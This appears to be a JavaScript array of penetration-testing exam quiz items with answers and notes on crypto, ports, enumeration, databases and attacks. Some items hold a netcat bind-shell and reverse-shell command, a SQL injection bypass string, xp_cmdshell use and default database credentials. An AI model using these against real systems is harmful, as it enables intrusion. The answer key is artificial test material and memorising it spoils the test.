{src:"Tips",t:"Cryptography",q:"A property of a STREAM cipher (vs block)?",o:["Low error propagation, high speed","High diffusion","Immune to tampering","Processes fixed-size blocks"],a:0,n:"Stream: bit-by-bit, fast, low diffusion, insertion-prone."},
{src:"Tips",t:"Cryptography",q:"A property of a BLOCK cipher (vs stream)?",o:["High diffusion and tamper resistance","Processes one bit at a time","No error propagation","Fastest possible encryption"],a:0,n:"Block: high diffusion; an error can corrupt a whole block."},
{src:"Tips",t:"Cryptography",q:"Cisco 'secret 5' password hashing uses?",o:["Salted MD5","SHA-256","scrypt","PBKDF2"],a:0,n:"4=SHA256(weak), 5=salted MD5, 7=XOR, 8=PBKDF2, 9=scrypt."},
{src:"Tips",t:"Cryptography",q:"Cisco 'secret 8' uses which algorithm?",o:["PBKDF2","scrypt","salted MD5","XOR"],a:0,n:"Type 8 = PBKDF2; Type 9 = scrypt (best)."},
{src:"Tips",t:"Cryptography",q:"NTLMv1 is based on which hash of the password?",o:["MD4","MD5","SHA-1","DES"],a:0,n:"NTLMv1 = MD4 of UTF-16LE password; NTLMv2 = HMAC-MD5."},
{src:"Tips",t:"Cryptography",q:"LANMAN hashing uses which cipher on the two 7-byte halves?",o:["DES","AES","RC4","MD5"],a:0,n:"Each 7-byte half is a DES key."},
{src:"Tips",t:"Cryptography",q:"A dictionary attack uses a list of ___; a rainbow table uses a list of ___.",o:["passwords ; hashes","hashes ; passwords","salts ; keys","users ; passwords"],a:0,n:"Rainbow tables are precomputed hash chains."},

// ---- Networking (subnetting, classes, IPv6) ----
{src:"Tips",t:"Networking",q:"How many total IPv4 addresses exist?",o:["~4.29 billion (2^32)","65,536","16 million","2^128"],a:0,n:"32-bit space = 4,294,967,296."},
{src:"Tips",t:"Networking",q:"How many bits is an IPv6 address?",o:["128","32","64","256"],a:0,n:"IPv6 = 128 bits; IPv4 = 32 bits."},
{src:"Tips",t:"Networking",q:"IPv6 loopback address?",o:["::1/128","127.0.0.1","FE80::","::/0"],a:0,n:"::1 is IPv6 loopback; FE80:: is link-local."},
{src:"Tips",t:"Networking",q:"IPv6 link-local addresses begin with?",o:["FE80","FF02","2001","::1"],a:0,n:"FE80::/10 link-local."},
{src:"Tips",t:"Networking",q:"Classful Class A default mask?",o:["255.0.0.0 (/8)","255.255.0.0 (/16)","255.255.255.0 (/24)","255.255.255.128 (/25)"],a:0,n:"A=/8, B=/16, C=/24."},
{src:"Tips",t:"Networking",q:"How many usable hosts in a Class C (/24)?",o:["254","256","255","253"],a:0,n:"256 addresses minus network + broadcast = 254."},
{src:"Tips",t:"Networking",q:"/26 provides how many addresses?",o:["64","32","128","16"],a:0,n:"/26 = 64 (62 usable)."},
{src:"Tips",t:"Networking",q:"/27 as a subnet mask?",o:["255.255.255.224","255.255.255.192","255.255.255.240","255.255.255.248"],a:0,n:"/27 = 32 addresses."},
{src:"Tips",t:"Networking",q:"RFC 1918 12-bit private block is?",o:["172.16.0.0/12","172.15.0.0/16","10.0.0.0/12","192.168.0.0/12"],a:0,n:"10/8, 172.16.0.0/12, 192.168/16."},
{src:"Tips",t:"Networking",q:"Which Nmap flag performs a full connect() scan?",o:["-sT","-sS","-sF","-sU"],a:0,n:"-sT connect, -sS half-open SYN, -sF FIN/inverse-flag."},
{src:"Tips",t:"Networking",q:"Which Nmap scan is 'half-open'?",o:["-sS (SYN)","-sT (connect)","-sF (FIN)","-sA (ACK)"],a:0,n:"SYN scan doesn't complete the handshake."},

// ---- Ports (extra) ----
{src:"Tips",t:"Ports & Services",q:"Which port range is 'well-known / system'?",o:["0–1023","1024–49151","49152–65535","0–65535"],a:0,n:"0–1023 well-known, 1024–49151 registered, 49152–65535 dynamic/ephemeral."},
{src:"Tips",t:"Ports & Services",q:"Which is the ephemeral/dynamic port range?",o:["49152–65535","0–1023","1024–49151","1024–65535"],a:0,n:"Ephemeral = 49152–65535."},
{src:"Tips",t:"Ports & Services",q:"Finger service listens on which port?",o:["79","69","70","88"],a:0,n:"Finger = TCP 79."},
{src:"Tips",t:"Ports & Services",q:"Kerberos uses which port?",o:["88","464","749","389"],a:0,n:"Kerberos = 88."},
{src:"Tips",t:"Ports & Services",q:"LDAP uses which port?",o:["389","636","443","3268"],a:0,n:"389 LDAP, 636 LDAPS."},
{src:"Tips",t:"Ports & Services",q:"Sun RPC / portmapper uses which port?",o:["111","135","112","113"],a:0,n:"111 = RPC portmapper."},
{src:"Tips",t:"Ports & Services",q:"POP3 uses which port?",o:["110","109","143","995"],a:0,n:"110 POP3, 995 POP3S, 143 IMAP."},
{src:"Tips",t:"Ports & Services",q:"IMAP uses which port?",o:["143","110","993","220"],a:0,n:"143 IMAP, 993 IMAPS."},
{src:"Tips",t:"Ports & Services",q:"Oracle TNS listener default port?",o:["1521","1433","1630","1526"],a:0,n:"1521 SQL*Net listener."},
{src:"Tips",t:"Ports & Services",q:"MySQL default port?",o:["3306","1433","5432","1521"],a:0,n:"3306 MySQL, 5432 Postgres, 1433 MSSQL."},
{src:"Tips",t:"Ports & Services",q:"PostgreSQL default port?",o:["5432","3306","1521","1433"],a:0,n:"5432 Postgres."},
{src:"Tips",t:"Ports & Services",q:"RADIUS authentication uses which port?",o:["1812","1813","1645","500"],a:0,n:"1812 auth, 1813 accounting."},
{src:"Tips",t:"Ports & Services",q:"L2TP VPN uses which port?",o:["1701","1723","500","4500"],a:0,n:"1701 L2TP, 1723 PPTP."},

// ---- Protocols & Layers (OSI, TCP/IP, data link) ----
{src:"Tips",t:"Protocols & Layers",q:"Which OSI layer does ARP operate at?",o:["Layer 2 – Data Link","Layer 3 – Network","Layer 4 – Transport","Layer 1 – Physical"],a:0,n:"ARP maps IP↔MAC at the data-link boundary."},
{src:"Tips",t:"Protocols & Layers",q:"Which OSI layer are NFS, SMB and RPC associated with?",o:["Layer 5 – Session","Layer 7 – Application","Layer 4 – Transport","Layer 6 – Presentation"],a:0,n:"Session layer per this syllabus mapping."},
{src:"Tips",t:"Protocols & Layers",q:"TLS/SSL is placed at which OSI layer in this syllabus?",o:["Layer 6 – Presentation","Layer 4 – Transport","Layer 7 – Application","Layer 3 – Network"],a:0,n:"Presentation layer (encryption/encoding)."},
{src:"Tips",t:"Protocols & Layers",q:"How many layers in the TCP/IP model?",o:["4","7","5","3"],a:0,n:"Network interface, Internet, Transport, Application."},
{src:"Tips",t:"Protocols & Layers",q:"RARP does what?",o:["Maps MAC addresses to IP addresses","Maps IP to MAC","Resolves hostnames","Routes between AS"],a:0,n:"Reverse ARP: MAC→IP (ARP is IP→MAC)."},
{src:"Tips",t:"Protocols & Layers",q:"CDP operates at which layer and what's its weakness?",o:["Layer 2; sends info in clear text","Layer 3; no encryption keys","Layer 4; replayable","Layer 7; brute-forceable"],a:0,n:"Cisco Discovery Protocol leaks device info in clear text."},

// ---- DNS (records) ----
{src:"Tips",t:"DNS",q:"Which DNS record maps a hostname to an IPv6 address?",o:["AAAA","A","PTR","CNAME"],a:0,n:"A = IPv4, AAAA = IPv6."},
{src:"Tips",t:"DNS",q:"Which DNS record provides an alias for another name?",o:["CNAME","A","MX","NS"],a:0,n:"Canonical Name record."},
{src:"Tips",t:"DNS",q:"Which DNS record reveals a host's CPU and OS?",o:["HINFO","TXT","SOA","NS"],a:0,n:"HINFO = host information (rarely used, leaky)."},
{src:"Tips",t:"DNS",q:"An NS record identifies the ___ of a DNS server (not its IP).",o:["name","IP address","MAC","zone serial"],a:0,n:"NS points to a nameserver's name."},
{src:"Tips",t:"DNS",q:"A reverse (PTR) lookup for 12.23.34.45 queries which name?",o:["45.34.23.12.in-addr.arpa","12.23.34.45.in-addr.arpa","45.34.23.12.ip6.arpa","arpa.in-addr.12.23.34.45"],a:0,n:"Octets reversed under in-addr.arpa."},
{src:"Tips",t:"DNS",q:"'DNS fast flux' is a technique used by?",o:["Botnets, to hide phishing/malware hosts","CDNs, to speed delivery","Registrars, for load balancing","ISPs, for caching"],a:0,n:"Rapidly rotating A records to evade takedown."},

// ---- Windows / Linux (filesystem, permissions, patching) ----
{src:"Tips",t:"Windows/Linux",q:"In Linux, third-party software is conventionally installed under?",o:["/opt","/var","/proc","/boot"],a:0,n:"/opt = optional/third-party packages."},
{src:"Tips",t:"Windows/Linux",q:"Which Linux directory exposes running processes and kernel info?",o:["/proc","/dev","/sys only","/var"],a:0,n:"/proc is a virtual filesystem for processes/kernel."},
{src:"Tips",t:"Windows/Linux",q:"Default file permission on Linux (before umask)?",o:["666","777","644","755"],a:0,n:"Files default 666, dirs 777, then umask subtracts."},
{src:"Tips",t:"Windows/Linux",q:"A directory created with umask 022 gets which permission?",o:["755 (rwxr-xr-x)","777","644","700"],a:0,n:"777 − 022 = 755."},
{src:"Tips",t:"Windows/Linux",q:"In octal permissions, the value 7 means?",o:["Read + Write + Execute","Read + Write","Read + Execute","Write + Execute"],a:0,n:"4+2+1 = rwx."},
{src:"Tips",t:"Windows/Linux",q:"A leading '4' in a 4-digit octal mode (e.g. 4755) sets what?",o:["SetUID","SetGID","Sticky bit","Read-only"],a:0,n:"4=setuid, 2=setgid, 1=sticky."},
{src:"Tips",t:"Windows/Linux",q:"How many bits define Unix file permissions?",o:["12 (setuid, setgid, sticky + 3×rwx)","9","10","8"],a:0,n:"3 special bits + 9 rwx bits."},
{src:"Tips",t:"Windows/Linux",q:"An NFS mount option that stops setuid programs granting privilege?",o:["nosuid","noexec","root_squash","ro"],a:0,n:"nosuid ignores setuid bits; noexec blocks binaries."},
{src:"Tips",t:"Windows/Linux",q:"Where does Solaris store password hashes?",o:["/etc/shadow","/etc/master.passwd","/etc/passwd","/etc/security"],a:0,n:"Solaris=/etc/shadow; FreeBSD=/etc/master.passwd."},
{src:"Tips",t:"Windows/Linux",q:"Which Windows patch tool scans for common security misconfigurations?",o:["MBSA","WSUS","SMS","SUS"],a:0,n:"Microsoft Baseline Security Analyzer."},
{src:"Tips",t:"Windows/Linux",q:"Which tool centrally manages/distributes Windows updates via a console?",o:["WSUS","MBSA","MBSACLI","EICAR"],a:0,n:"Windows Server Update Services."},
{src:"Tips",t:"Windows/Linux",q:"Which CMD command lists installed patches (QFEs)?",o:["wmic qfe","get-hotfix","showrev -p","rpm -qa"],a:0,n:"wmic qfe list; PowerShell uses Get-Hotfix; systeminfo also shows hotfixes."},
{src:"Tips",t:"Windows/Linux",q:"Where is the Windows hosts file located?",o:["%SYSTEMROOT%\\System32\\drivers\\etc\\hosts","%SYSTEMROOT%\\System32\\config\\hosts","C:\\hosts","%WINDIR%\\hosts"],a:0,n:"…\\System32\\drivers\\etc\\hosts."},
{src:"Tips",t:"Windows/Linux",q:"IIS 6 shipped with which Windows version?",o:["Windows Server 2003","Windows 2000","Windows Server 2008","Windows XP"],a:0,n:"IIS 5=2000, 5.1=XP, 6=2003, 7=2008."},
{src:"Tips",t:"Windows/Linux",q:"IIS 8.5 shipped with which Windows version?",o:["Windows Server 2012 R2","Windows Server 2012","Windows Server 2008 R2","Windows 8"],a:0,n:"IIS 8.0=2012, 8.5=2012 R2."},
{src:"Tips",t:"Windows/Linux",q:"Command to list Active Directory domain controllers?",o:["net group \"Domain Controllers\" /domain","net view /domain","nbtstat -A","net user /domain"],a:0,n:"Lists DCs from the domain group."},
{src:"Tips",t:"Windows/Linux",q:"What is the AD Global Catalog?",o:["A distributed searchable store on DCs for fast forest-wide lookups","A backup of the SAM","The FSMO PDC role","A DNS zone"],a:0,n:"Partial replica of every object in the forest."},
{src:"Tips",t:"Windows/Linux",q:"List installed packages on Solaris with?",o:["pkginfo","rpm -qa","dpkg -l","yum list"],a:0,n:"Solaris=pkginfo; RedHat=rpm -qa / yum list installed."},

// ---- Enumeration ----
{src:"Tips",t:"Enumeration",q:"An SSH banner 'SSH-1.99' indicates?",o:["Both SSH 1.5 and 2.0 are supported","Only SSH 1.5","Only SSH 2.0","A vulnerable beta"],a:0,n:"1.99 = server offers both protocol versions."},
{src:"Tips",t:"Enumeration",q:"In 'SSH-2.0-OpenSSH_3.5p1', what is 3.5p1?",o:["The OpenSSH software version","The protocol version","The cipher","The port"],a:0,n:"2.0 = protocol, 3.5p1 = software build."},
{src:"Tips",t:"Enumeration",q:"Which SMTP command is most effective when EXPN/VRFY are disabled?",o:["RCPT TO:","MAIL FROM:","HELO","DATA"],a:0,n:"RCPT TO: enumeration exploits Sendmail behaviour."},
{src:"Tips",t:"Enumeration",q:"An 'open mail relay' is a server that?",o:["Relays mail for unauthenticated senders","Encrypts all mail","Blocks all external mail","Requires TLS"],a:0,n:"Abused by spammers; gets blacklisted."},
{src:"Tips",t:"Enumeration",q:"Which is NOT a standard SNMP operation?",o:["Connect","Get","GetNext","Trap"],a:0,n:"SNMP ops: Get, GetNext, GetBulk, Set, Response, Trap, Inform."},
{src:"Tips",t:"Enumeration",q:"'rpcinfo -p <host>' does what?",o:["Lists accessible RPC service endpoints","Mounts an NFS share","Scans TCP ports","Enumerates SMB users"],a:0,n:"Queries the portmapper for registered RPC services."},
{src:"Tips",t:"Enumeration",q:"'showmount -e <host>' reveals?",o:["Exported NFS shares","RPC endpoints","SMB sessions","Logged-in users"],a:0,n:"Lists NFS exports (potential writable shares)."},
{src:"Tips",t:"Enumeration",q:"NFS UID manipulation lets an attacker?",o:["Impersonate a file's owner UID to read/write it","Escalate to root locally","Bypass Kerberos","Spoof MAC addresses"],a:0,n:"With no_root_squash / matching UID you become the owner."},
{src:"Tips",t:"Enumeration",q:"Which tool lists users logged into a remote Unix host (r-service)?",o:["rwho / rusers","finger only","netstat","who"],a:0,n:"rwho and rusers query the network for logged-in users."},
{src:"Tips",t:"Enumeration",q:"Finger with a null query (finger @host) typically returns?",o:["Currently logged-in users","The password file","Open ports","The SSH banner"],a:0,n:"Leaks usernames; helps fingerprint Solaris vs Cisco IOS."},
{src:"Tips",t:"Enumeration",q:"Apache HTTP server is noted as vulnerable to which enumeration?",o:["User enumeration","SQL injection by default","Directory listing always","Kerberoasting"],a:0,n:"Response differences can enumerate valid users."},

// ---- Databases (advanced) ----
{src:"Tips",t:"Databases",q:"Which MSSQL stored procedure runs OS commands?",o:["xp_cmdshell","xp_msver","sp_who","xp_dirtree"],a:0,n:"EXEC master..xp_cmdshell 'whoami'."},
{src:"Tips",t:"Databases",q:"Default MySQL root credentials cited in the notes?",o:["root / MYSQL","sa / (blank)","admin / admin","root / toor"],a:0,n:"root|MYSQL per the tips."},
{src:"Tips",t:"Databases",q:"Which Oracle default account can log in and read password hashes?",o:["DBSNMP","SCOTT","OUTLN","ANONYMOUS"],a:0,n:"DBSNMP/DBSNMP — monitoring account, reads passwords."},
{src:"Tips",t:"Databases",q:"Default password for Oracle SYSTEM account?",o:["MANAGER","CHANGE_ON_INSTALL","TIGER","SYSTEM"],a:0,n:"SYSTEM/MANAGER; SYS/CHANGE_ON_INSTALL."},
{src:"Tips",t:"Databases",q:"In PostgreSQL, password hashes are stored in?",o:["pg_shadow","mysql.user","sys.user$","master..syslogins"],a:0,n:"SELECT username,passwd FROM pg_shadow."},
{src:"Tips",t:"Databases",q:"Query for the current database in MySQL?",o:["SELECT database();","SELECT DB_NAME();","SELECT current_database();","SELECT name FROM v$database;"],a:0,n:"MySQL=database(), MSSQL=DB_NAME(), Postgres=current_database()."},
{src:"Tips",t:"Databases",q:"By default, the Oracle TNS listener has which authentication?",o:["None (unauthenticated)","Password required","Kerberos","Certificate-based"],a:0,n:"Default listener has no auth — commands run outside the DB."},
{src:"Tips",t:"Databases",q:"MySQL versions < 5.1 had which notable flaw?",o:["Authentication bypass (accepts wrong password)","Buffer overflow in login","SQLi in USE","Default open relay"],a:0,n:"A bug allowed auth even with an incorrect password."},

// ---- Vulns & Attacks (languages, injection, X11) ----
{src:"Tips",t:"Vulns & Attacks",q:"A classic SQL injection authentication-bypass payload is?",o:["' OR '1'='1' --","; DROP TABLE users","<script>alert(1)</script>","../../etc/passwd"],a:0,n:"Makes the WHERE clause always true, -- comments the rest."},
{src:"Tips",t:"Vulns & Attacks",q:"Which characters are abused in LDAP injection?",o:["( ) | * ","; -- '","< > &","{ } []"],a:0,n:"LDAP filter metacharacters like *, |, ( ) alter the query."},
{src:"Tips",t:"Vulns & Attacks",q:"Buffer overflow is most associated with which language family?",o:["C (manual memory management)","Java","PHP","Python"],a:0,n:"C/C++ lack automatic bounds checking."},
{src:"Tips",t:"Vulns & Attacks",q:"The EICAR file is used to?",o:["Test antivirus detection without real malware","Exploit AV engines","Encrypt test data","Fingerprint an OS"],a:0,n:"A harmless standardized AV test string."},
{src:"Tips",t:"Vulns & Attacks",q:"With an accessible X server, an attacker capturing keystrokes needs which file/cookie?",o:["The MIT-MAGIC-COOKIE from .Xauthority","The SAM file","A Kerberos TGT","The /etc/shadow hash"],a:0,n:"xauth cookie authorizes display access."},
{src:"Tips",t:"Vulns & Attacks",q:"'xhost +' with no address does what?",o:["Allows ANY remote host to access the X server","Disables all remote access","Grants only localhost","Enables xauth"],a:0,n:"Dangerously opens the X server to everyone."},
{src:"Tips",t:"Vulns & Attacks",q:"VRRP hijacking allows an attacker to?",o:["Become master router (DoS or sniff traffic)","Crack WPA keys","Bypass LDAP auth","Read the SAM"],a:0,n:"Taking the virtual IP redirects/sniffs traffic."},

// ---- Wireless (EAP family, TKIP/CCMP) ----
{src:"Tips",t:"Wireless",q:"TKIP was introduced with which standard, wrapping WEP's RC4?",o:["WPA (802.11i draft)","WPA2","WPA3","WEP2"],a:0,n:"TKIP is a wrapper over RC4 with 128-bit keys; WPA2 moved to AES-CCMP."},
{src:"Tips",t:"Wireless",q:"WPA2 replaced TKIP with which encryption?",o:["AES-CCMP","RC4","DES","3DES"],a:0,n:"CCMP = Counter Mode CBC-MAC Protocol (AES)."},
{src:"Tips",t:"Wireless",q:"LEAP is primarily associated with which vendor's WLANs?",o:["Cisco (Aironet)","Aruba","Juniper","Netgear"],a:0,n:"LEAP uses dynamic WEP keys + mutual auth."},
{src:"Tips",t:"Wireless",q:"PEAP provides what?",o:["A secure tunnel to transport legacy auth over Wi-Fi","Static WEP keys","AES bulk encryption","MAC filtering"],a:0,n:"Protected EAP wraps weaker auth in TLS."},

// ---- Law & Compliance (extra) ----
{src:"Tips",t:"Law & Compliance",q:"Which right does the Human Rights Act 1998 protect that's relevant to pentesting?",o:["Respect for private and family life / correspondence","Freedom of assembly","Right to a fair trial","Freedom of expression"],a:0,n:"Article 8 — be careful with personal data/comms."},
{src:"Tips",t:"Law & Compliance",q:"The Police and Justice Act 2006 notably made which activity an offence?",o:["Supplying/owning hacking tools & performing DoS","Encrypting data","Running a proxy","Port scanning generally"],a:0,n:"Also raised CMA penalties (extraditable)."},
{src:"Tips",t:"Law & Compliance",q:"Which is NOT one of the four risk treatment options?",o:["Encrypt","Avoid","Reduce","Transfer"],a:0,n:"The four: avoid, reduce, accept, transfer."},

// ---- Tools & Output (netcat, ICMP) ----
{src:"Tips",t:"Tools & Output",q:"Which netcat command sets up a bind shell listener on Windows?",o:["nc -nlvp 4444 -e cmd.exe","nc -nv 10.0.0.1 4444","nc -nlvp 4444","nc -e /bin/bash 10.0.0.1 4444"],a:0,n:"-e binds a program to the connection; -nlvp = listen."},
{src:"Tips",t:"Tools & Output",q:"ICMP type 3 is?",o:["Destination Unreachable","Echo Reply","Redirect","Time Exceeded"],a:0,n:"3=Unreachable, 5=Redirect, 11=Time Exceeded."},
{src:"Tips",t:"Tools & Output",q:"ICMP type 11 is?",o:["Time Exceeded (e.g. TTL=0 in traceroute)","Echo Request","Timestamp","Parameter Problem"],a:0,n:"Traceroute relies on Time Exceeded replies."},
];
